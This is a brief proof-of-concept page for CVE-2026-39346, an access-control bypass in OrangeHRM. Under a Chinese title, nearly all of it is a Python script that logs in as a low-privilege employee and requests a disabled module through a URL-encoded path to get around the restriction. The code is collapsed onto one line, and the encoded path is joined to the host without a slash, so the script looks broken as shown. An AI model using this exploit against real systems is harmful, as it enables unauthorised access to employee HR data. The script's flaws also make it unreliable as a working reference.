CVE-2026-39346 OrangeHRM 访问控制绕过漏洞

import requests # Configuration target_url = "http://target-orangehrm.com" login_endpoint = "/auth/login" username = "employee" password = "password" # The module disabled by admin, e.g., 'maintenance' # Normal access to /maintenance/view is blocked # We try to bypass using URL encoding disabled_module_path = "/maintenance/view" encoded_path = disabled_module_path.replace("/", "%2F") session = requests.Session() # 1. Authenticate login_data = {"username": username, "password": password} login_resp = session.post(target_url + login_endpoint, data=login_data) if login_resp.status_code == 200: # 2. Exploit: Send request with encoded path exploit_url = f"{target_url}{encoded_path}" response = session.get(exploit_url) # 3. Verify if response.status_code == 200 and "Maintenance" in response.text: print(f"[+] Exploit Successful! Accessed disabled module via: {exploit_url}") else: print("[-] Exploit Failed or Patched.") else: print("[-] Login Failed.")